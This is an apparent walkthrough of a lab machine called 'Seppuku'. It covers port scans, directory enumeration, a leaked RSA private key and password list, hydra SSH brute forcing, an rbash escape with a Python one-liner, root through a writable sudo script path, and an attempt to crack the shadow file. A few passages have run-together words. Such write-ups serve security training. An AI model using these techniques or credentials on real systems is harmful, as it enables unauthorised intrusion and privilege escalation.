The basic enumeration was associated with port scan and sub-directory enumration, sensitive information available in the open ports and sub-directories led to initial foothold to the system. Misconfigured sudoers file and file permissions was also present which led to escalating privileges.
Thus, sensitive information which can lead to the system breach should be kept confidential and sudoers file and the file permissions should be inspected regularly to minimize and mitigate the risk of escalating privileges from a low privileged user.
initial port scan here which is as:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 03:05 EDT
Nmap scan report for seppuku (192.168.220.90)
Host is up (0.28s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
7080/tcp open empowerid
7601/tcp open unknown
8088/tcp open radan-http
Nmap done: 1 IP address (1 host up) scanned in 937.58 seconds
Aggressive nmap scan here which is as:
# Nmap 7.92 scan initiated Thu Jun 16 02:13:07 2022 as: nmap -sC -sV -p139,445,7080,7601,8088 -oN initial/nmap2 seppuku
Nmap scan report for seppuku (192.168.243.90)
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open ssl/empowerid LiteSpeed
|_http-title: Did not follow redirect to https://seppuku:7080/
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after: 2022-08-11T06:51:35
|_http-server-header: LiteSpeed
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
7601/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Seppuku
|_http-server-header: Apache/2.4.38 (Debian)
8088/tcp open http LiteSpeed httpd
|_http-title: Seppuku
|_http-server-header: LiteSpeed
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-06-16T06:13:50
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: seppuku
| NetBIOS computer name: SEPPUKU\x00
| Domain name: \x00
| FQDN: seppuku
|_ System time: 2022-06-16T02:13:51-04:00
|_clock-skew: mean: 1h20m00s, deviation: 2h18m35s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 16 02:14:07 2022 -- 1 IP address (1 host up) scanned in 59.28 seconds
The port 7601 had the apache server on it which was open, so ran a gobuster scan on it and obtained the following results.
Gobuster scan here which is as:
/.hta (Status: 403) [Size: 274]
/.hta.html (Status: 403) [Size: 274]
/.hta.php (Status: 403) [Size: 274]
/.htaccess.html (Status: 403) [Size: 274]
/.htpasswd (Status: 403) [Size: 274]
/.htaccess (Status: 403) [Size: 274]
/.htaccess.php (Status: 403) [Size: 274]
/.htpasswd.php (Status: 403) [Size: 274]
/.htpasswd.html (Status: 403) [Size: 274]
/a (Status: 301) [Size: 305] [--> http://seppuku:7601/a/]
/b (Status: 301) [Size: 305] [--> http://seppuku:7601/b/]
/c (Status: 301) [Size: 305] [--> http://seppuku:7601/c/]
/ckeditor (Status: 301) [Size: 312] [--> http://seppuku:7601/ckeditor/]
/d (Status: 301) [Size: 305] [--> http://seppuku:7601/d/]
/database (Status: 301) [Size: 312] [--> http://seppuku:7601/database/]
/e (Status: 301) [Size: 305] [--> http://seppuku:7601/e/]
/f (Status: 301) [Size: 305] [--> http://seppuku:7601/f/]
/h (Status: 301) [Size: 305] [--> http://seppuku:7601/h/]
/index.html (Status: 200) [Size: 171]
/index.html (Status: 200) [Size: 171]
/keys (Status: 301) [Size: 308] [--> http://seppuku:7601/keys/]
/production (Status: 301) [Size: 314] [--> http://seppuku:7601/production/]
/q (Status: 301) [Size: 305] [--> http://seppuku:7601/q/]
/r (Status: 301) [Size: 305] [--> http://seppuku:7601/r/]
/secret (Status: 301) [Size: 310] [--> http://seppuku:7601/secret/]
/server-status (Status: 403) [Size: 274]
/t (Status: 301) [Size: 305] [--> http://seppuku:7601/t/]
/w (Status: 301) [Size: 305] [--> http://seppuku:7601/w/]
From the above sub-dir enumeration, got us 2 valuable sub-directories, secret and keys.
curl http://seppuku:7601/keys/ got us two keys as:
private:
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAypJlwjKXf0F4YvL2gfwvoUuvB7fuGMMfCe41gLCsTsleOUy2
CJX+oNwVVKPpl6TYI4nXPGbiwfGzoxm0FZa7D9yr83OgwuvMMp83OkVcwL9v+x7a
tK8AAVZ0NjvOPGkvEhB2rPS2mKg1xRKXCM7pA0KSOoDbk9coOpadjg4G0f1YPWrw
p6iLfIErfY2+5hS7QyTQpuRmHuR4eKLF1NFRp8gYuNCVtr0n2Uu6hWuI7RWBGQZJ
Joj8LKjfRRYmKGpyqiGTdRy+8yCyAuT55shuCzXuc+/3HE2jACOD8+pSPKjwxzm4
fuaSfBTUkHfyhiSKIkop2YfIDLKRPM8dGn5zuQIDAQABAoIBADM+s7Vb3Q1ZP54w
foHFjTsNjVqzge0Lt1doxmomx4Aq2sY+DLLBVyfUZSUDTj2JexAKd8OU93o+rcXt
46uudOX/WhR9RMbqpb6MnokEMQGlrCtn08Xvm127RCzQFk0cAsdcGNmKEoMt0mRn
XoPg6/tiJOHd5S5SOKARqAveqoUGUYI3xgsiRpj8CCRIDUgHi9J0++qUeauVw3m3
lvyTnUTw0uf5+sRkI173CUY+ygJapGM7Lg59xzcjEq5H4so0IztQo3o/pOIfeS6W
bqIpY7D63YBGLgpi9JcN/d2bSfafkfhcrAcjPjRXwEFPmYjMbsTBOKcTtCSDVo6/
ho6fTl0CgYEA9F1uIkqxFKIMt2/uK4/1gPOXy/1cjxcsFoah0Ql7d0gj26H6AgXk
nPncIoO1kojPnB+TUy4qz+Bd7teDbkHSaWNJYIVJZQbvskstwgL4+XamiWrJA/Jp
h7y0I0zRxCMBj5yhBNrp6P+f8vtVMpjbKV17jfe6aakfyuayPugHHh8CgYEA1DeM
4lR/+/fUbxtws+aTx8h9TwisYq38D39KNsWkynnb+9pnLCbVbVETtv4sfD/aQfah
R7CxOG+mD4Vryjpk/wwzZeUDzcQpiTx4RsgP6MkFU8knORKfBdimaUpiasWlNWgy
caXR/iA6EmA4jht8vf/+UOUV8GXV9VqDIWUhgycCgYEAvJaGcqyWMUhG7CLT+oal
f5l/Iw0rq7rEabYJmBvrT0k7czt0iK8nmgYy3+gp7ybqoqCzwFQ28itEExn78tGV
o4Pek0EKPY+22TCv5bUJlOz+5bql3AfvbbQyibO1h9tETyMgGXEhaJIvTQSu4deZ
/DiLLCttkDHXuW2FTosfQx0CgYEAkhGOSjapRRBHSxaTE3Cw5UFNZvnsVZu1tCEE
PwD5NVh9HzQr8YrlOnIk5L68deUpYF/WkNbAlLzcizBlifN5kseeFRN188qCYHCb
xPRtZuf+X7ZD5he4FzkRCcXmSeGynjkTB4CAMq+R6RYLt1yaFtk9/gZAfJBLna5o
NbM7Rt8CgYA5oPRfIpKZ5G9LJEAsBUONgBsrpXs+816ZEvBGsqPs/NPhhZMFetKm
RXxYAiEUudMsahP4Woeuxy8kWfM2J2ltwC/HRFuKnKfsHBhsn/FilspYfrafr985
tFnL/K9Z8le1saEGjwCu6zKto7CaFjj2D4Y9ji0sHGBO+tVbtmU/Jg==
-----END RSA PRIVATE KEY-----
and its backup private.bak which was the same as the private key.
From the /secret/ got:
[PARENTDIR] Parent Directory -
[ ] hostname 2020-05-13 03:41 8
[IMG] jack.jpg 2018-09-12 03:49 58K
[ ] passwd.bak 2020-05-13 03:47 2.7K
[ ] password.lst 2020-05-13 03:59 672
[ ] shadow.bak 2020-05-13 03:48 1.4K
And got the hostname from /secret/hostname which is seppuku.
Got a userlist from /secret/passwd.bak which is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:110::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
lightdm:x:110:115:Light Display Manager:/var/lib/lightdm:/bin/false
cups-pk-helper:x:111:118:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:113:119::/nonexistent:/bin/false
kernoops:x:114:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:115:121::/var/lib/saned:/usr/sbin/nologin
pulse:x:116:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:117:124:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:118:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/var/run/hplip:/bin/false
debian-tor:x:120:126::/var/lib/tor:/bin/false
iodine:x:121:65534::/var/run/iodine:/usr/sbin/nologin
thpot:x:122:65534:Honeypot user,,,:/usr/share/thpot:/dev/null
postfix:x:123:128::/var/spool/postfix:/usr/sbin/nologin
nm-openvpn:x:124:130:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
statd:x:125:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
nm-openconnect:x:127:131:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/usr/sbin/nologin
rabbit-hole:x:1001:1001:,,,:/home/rabbit-hole:/bin/bash
and filtering users which can execute /bin/bash using cat passwd.bak | grep '/bin/bash' got:
root:x:0:0:root:/root:/bin/bash
rabbit-hole:x:1001:1001:,,,:/home/rabbit-hole:/bin/bash
which is a rabbit hole!
But, got a password list from /secret/password.lst:
123456
12345
password
password1
123456789
12345678
1234567890
abc123
computer
tigger
1234
qwerty
money
carmen
mickey
secret
summer
internet
a1b2c3
123
service
canada
hello
ranger
shadow
baseball
donald
harley
hockey
letmein
maggie
mike
mustang
snoopy
buster
dragon
jordan
michael
michelle
mindy
patrick
123abc
andrew
bear
calvin
changeme
diamond
withme
withyou
matthew
miller
tiger
trustno1
alex
apple
avalon
brandy
chelsea
coffee
falcon
freedom
gandalf
green
helpme
linda
magic
merlin
newyork
soccer
thomas
wizard
asdfgh
bandit
batman
boris
butthead
dorothy
eeyoree
fishing
Football
george
happy
iloveyou
jennifer
jonathan
love
marina
master
missy
monday
monkey
natasha
The information gathered above can be used to perform a bruteforce attack into the server.
From the above retrived password list and the hostname tried getting into the server using ssh by bruteforcing using hydra by hydra -l seppuku -P password.lst ssh://seppuku -f
Got the password for the username seppuku from the above brute-forcing which is eeyoree.
ssh using the above credentials to the machine.
Found that we were running on rbash so used python -c "import os; os.system('/bin/bash');" to spawn a bash shell since the rbash had commands restricted.
Found out that the user could execute /usr/bin/ln -sf /root/ /tmp/ as superuser, which only meant that we could create a link of /root/ folder into /tmp/ folder but reading into the /tmp/root isn’t possible since it is just a link to /root/ and we donot have permissions of read on /root/.
Looking all the files in the home directory; found a .passwd file which had the key : 12345685213456!@!@A.
From /etc/passwd got to know that there were 2 more users named samurai and tanto. The ssh private key which we found at http://seppuku:7601/keys/private might be of one of the users so tried:
tanto
chmod 400 ssh.privkey && ssh -i ssh.privkey samurai@seppukuwhich failed so tried the user tanto byssh -i ssh.privkey tanto@seppukuand got into the server astanto.
samurai The password we got from the
~/.passwdofsappukucould be the password of samurai so tried,su samuraiand enter the retrived password and got into the server assamurai. Finally got into the server as the usersamurai.
root
To get the files which could be run as superuser, used sudo -l and found (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*.
Which means that the script which is present in ../../../../../../../home/tanto/.cgi_bin/bin is run as sudo. But the folder has write permission by user tanto.
ssh into user tanto.
Found that there was no ../../../home/tanto/.cgi_bin so made the directory and the file ../../../../../../../home/tanto/.cgi_bin/bin.
Finally, wrote a simple script to spawn a bash shell in the ~/.cgi_bin/bin file. And changed the mode to 777 which is read, write and executable for all the users.
From the user samurai used sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/* which ran the script in the /../../../../../../home/tanto/.cgi_bin/bin which spawwned a bash shell with the privileges of a superuser.
After the exploitation, the /etc/shadow file was extracted with the motive of cracking the root password using hashcat. The password was stored as a SHA512 hash. Used the rockyou.txt & the above retrived password.lst file with hashcat to try and bruteforce the password but failed.